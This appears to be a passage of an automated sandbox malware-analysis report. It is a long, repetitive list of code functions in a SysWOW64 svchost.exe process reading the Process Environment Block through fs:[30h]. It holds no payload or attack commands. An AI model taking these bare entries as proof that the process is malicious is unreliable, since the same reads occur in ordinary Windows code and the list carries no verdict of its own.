            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov eax, dword ptr fs:[00000030h]1_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov eax, dword ptr fs:[00000030h]1_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov eax, dword ptr fs:[00000030h]1_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov ecx, dword ptr fs:[00000030h]1_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov eax, dword ptr fs:[00000030h]1_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov eax, dword ptr fs:[00000030h]1_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FA352 mov eax, dword ptr fs:[00000030h]1_2_034FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D8350 mov ecx, dword ptr fs:[00000030h]1_2_034D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0350634F mov eax, dword ptr fs:[00000030h]1_2_0350634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D437C mov eax, dword ptr fs:[00000030h]1_2_034D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A30B mov eax, dword ptr fs:[00000030h]1_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A30B mov eax, dword ptr fs:[00000030h]1_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A30B mov eax, dword ptr fs:[00000030h]1_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C310 mov ecx, dword ptr fs:[00000030h]1_2_0342C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03450310 mov ecx, dword ptr fs:[00000030h]1_2_03450310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03508324 mov eax, dword ptr fs:[00000030h]1_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03508324 mov ecx, dword ptr fs:[00000030h]1_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03508324 mov eax, dword ptr fs:[00000030h]1_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03508324 mov eax, dword ptr fs:[00000030h]1_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EC3CD mov eax, dword ptr fs:[00000030h]1_2_034EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B63C0 mov eax, dword ptr fs:[00000030h]1_2_034B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE3DB mov eax, dword ptr fs:[00000030h]1_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE3DB mov eax, dword ptr fs:[00000030h]1_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE3DB mov ecx, dword ptr fs:[00000030h]1_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE3DB mov eax, dword ptr fs:[00000030h]1_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D43D4 mov eax, dword ptr fs:[00000030h]1_2_034D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D43D4 mov eax, dword ptr fs:[00000030h]1_2_034D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E3F0 mov eax, dword ptr fs:[00000030h]1_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E3F0 mov eax, dword ptr fs:[00000030h]1_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E3F0 mov eax, dword ptr fs:[00000030h]1_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034663FF mov eax, dword ptr fs:[00000030h]1_2_034663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E388 mov eax, dword ptr fs:[00000030h]1_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E388 mov eax, dword ptr fs:[00000030h]1_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E388 mov eax, dword ptr fs:[00000030h]1_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345438F mov eax, dword ptr fs:[00000030h]1_2_0345438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345438F mov eax, dword ptr fs:[00000030h]1_2_0345438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428397 mov eax, dword ptr fs:[00000030h]1_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428397 mov eax, dword ptr fs:[00000030h]1_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428397 mov eax, dword ptr fs:[00000030h]1_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B8243 mov eax, dword ptr fs:[00000030h]1_2_034B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B8243 mov ecx, dword ptr fs:[00000030h]1_2_034B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0350625D mov eax, dword ptr fs:[00000030h]1_2_0350625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A250 mov eax, dword ptr fs:[00000030h]1_2_0342A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436259 mov eax, dword ptr fs:[00000030h]1_2_03436259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EA250 mov eax, dword ptr fs:[00000030h]1_2_034EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EA250 mov eax, dword ptr fs:[00000030h]1_2_034EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434260 mov eax, dword ptr fs:[00000030h]1_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434260 mov eax, dword ptr fs:[00000030h]1_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434260 mov eax, dword ptr fs:[00000030h]1_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342826B mov eax, dword ptr fs:[00000030h]1_2_0342826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342823B mov eax, dword ptr fs:[00000030h]1_2_0342823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]1_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]1_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]1_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]1_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]1_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035062D6 mov eax, dword ptr fs:[00000030h]1_2_035062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402E1 mov eax, dword ptr fs:[00000030h]1_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402E1 mov eax, dword ptr fs:[00000030h]1_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402E1 mov eax, dword ptr fs:[00000030h]1_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E284 mov eax, dword ptr fs:[00000030h]1_2_0346E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E284 mov eax, dword ptr fs:[00000030h]1_2_0346E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0283 mov eax, dword ptr fs:[00000030h]1_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0283 mov eax, dword ptr fs:[00000030h]1_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0283 mov eax, dword ptr fs:[00000030h]1_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402A0 mov eax, dword ptr fs:[00000030h]1_2_034402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402A0 mov eax, dword ptr fs:[00000030h]1_2_034402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov ecx, dword ptr fs:[00000030h]1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h]1_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h]1_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov ecx, dword ptr fs:[00000030h]1_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h]1_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h]1_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C156 mov eax, dword ptr fs:[00000030h]1_2_0342C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C8158 mov eax, dword ptr fs:[00000030h]1_2_034C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436154 mov eax, dword ptr fs:[00000030h]1_2_03436154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436154 mov eax, dword ptr fs:[00000030h]1_2_03436154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504164 mov eax, dword ptr fs:[00000030h]1_2_03504164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504164 mov eax, dword ptr fs:[00000030h]1_2_03504164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA118 mov ecx, dword ptr fs:[00000030h]1_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA118 mov eax, dword ptr fs:[00000030h]1_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA118 mov eax, dword ptr fs:[00000030h]1_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA118 mov eax, dword ptr fs:[00000030h]1_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F0115 mov eax, dword ptr fs:[00000030h]1_2_034F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03460124 mov eax, dword ptr fs:[00000030h]1_2_03460124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F61C3 mov eax, dword ptr fs:[00000030h]1_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F61C3 mov eax, dword ptr fs:[00000030h]1_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h]1_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h]1_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h]1_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h]1_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035061E5 mov eax, dword ptr fs:[00000030h]1_2_035061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034601F8 mov eax, dword ptr fs:[00000030h]1_2_034601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03470185 mov eax, dword ptr fs:[00000030h]1_2_03470185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EC188 mov eax, dword ptr fs:[00000030h]1_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EC188 mov eax, dword ptr fs:[00000030h]1_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D4180 mov eax, dword ptr fs:[00000030h]1_2_034D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D4180 mov eax, dword ptr fs:[00000030h]1_2_034D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B019F mov eax, dword ptr fs:[00000030h]1_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B019F mov eax, dword ptr fs:[00000030h]1_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B019F mov eax, dword ptr fs:[00000030h]1_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B019F mov eax, dword ptr fs:[00000030h]1_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A197 mov eax, dword ptr fs:[00000030h]1_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A197 mov eax, dword ptr fs:[00000030h]1_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A197 mov eax, dword ptr fs:[00000030h]1_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03432050 mov eax, dword ptr fs:[00000030h]1_2_03432050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6050 mov eax, dword ptr fs:[00000030h]1_2_034B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345C073 mov eax, dword ptr fs:[00000030h]1_2_0345C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B4000 mov ecx, dword ptr fs:[00000030h]1_2_034B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E016 mov eax, dword ptr fs:[00000030h]1_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E016 mov eax, dword ptr fs:[00000030h]1_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E016 mov eax, dword ptr fs:[00000030h]1_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E016 mov eax, dword ptr fs:[00000030h]1_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A020 mov eax, dword ptr fs:[00000030h]1_2_0342A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C020 mov eax, dword ptr fs:[00000030h]1_2_0342C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6030 mov eax, dword ptr fs:[00000030h]1_2_034C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B20DE mov eax, dword ptr fs:[00000030h]1_2_034B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0342A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034380E9 mov eax, dword ptr fs:[00000030h]1_2_034380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B60E0 mov eax, dword ptr fs:[00000030h]1_2_034B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C0F0 mov eax, dword ptr fs:[00000030h]1_2_0342C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034720F0 mov ecx, dword ptr fs:[00000030h]1_2_034720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343208A mov eax, dword ptr fs:[00000030h]1_2_0343208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034280A0 mov eax, dword ptr fs:[00000030h]1_2_034280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C80A8 mov eax, dword ptr fs:[00000030h]1_2_034C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F60B8 mov eax, dword ptr fs:[00000030h]1_2_034F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F60B8 mov ecx, dword ptr fs:[00000030h]1_2_034F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346674D mov esi, dword ptr fs:[00000030h]1_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346674D mov eax, dword ptr fs:[00000030h]1_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346674D mov eax, dword ptr fs:[00000030h]1_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430750 mov eax, dword ptr fs:[00000030h]1_2_03430750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE75D mov eax, dword ptr fs:[00000030h]1_2_034BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472750 mov eax, dword ptr fs:[00000030h]1_2_03472750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472750 mov eax, dword ptr fs:[00000030h]1_2_03472750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B4755 mov eax, dword ptr fs:[00000030h]1_2_034B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438770 mov eax, dword ptr fs:[00000030h]1_2_03438770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C700 mov eax, dword ptr fs:[00000030h]1_2_0346C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430710 mov eax, dword ptr fs:[00000030h]1_2_03430710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03460710 mov eax, dword ptr fs:[00000030h]1_2_03460710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C720 mov eax, dword ptr fs:[00000030h]1_2_0346C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C720 mov eax, dword ptr fs:[00000030h]1_2_0346C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346273C mov eax, dword ptr fs:[00000030h]1_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346273C mov ecx, dword ptr fs:[00000030h]1_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346273C mov eax, dword ptr fs:[00000030h]1_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AC730 mov eax, dword ptr fs:[00000030h]1_2_034AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343C7C0 mov eax, dword ptr fs:[00000030h]1_2_0343C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B07C3 mov eax, dword ptr fs:[00000030h]1_2_034B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034527ED mov eax, dword ptr fs:[00000030h]1_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034527ED mov eax, dword ptr fs:[00000030h]1_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034527ED mov eax, dword ptr fs:[00000030h]1_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE7E1 mov eax, dword ptr fs:[00000030h]1_2_034BE7E1
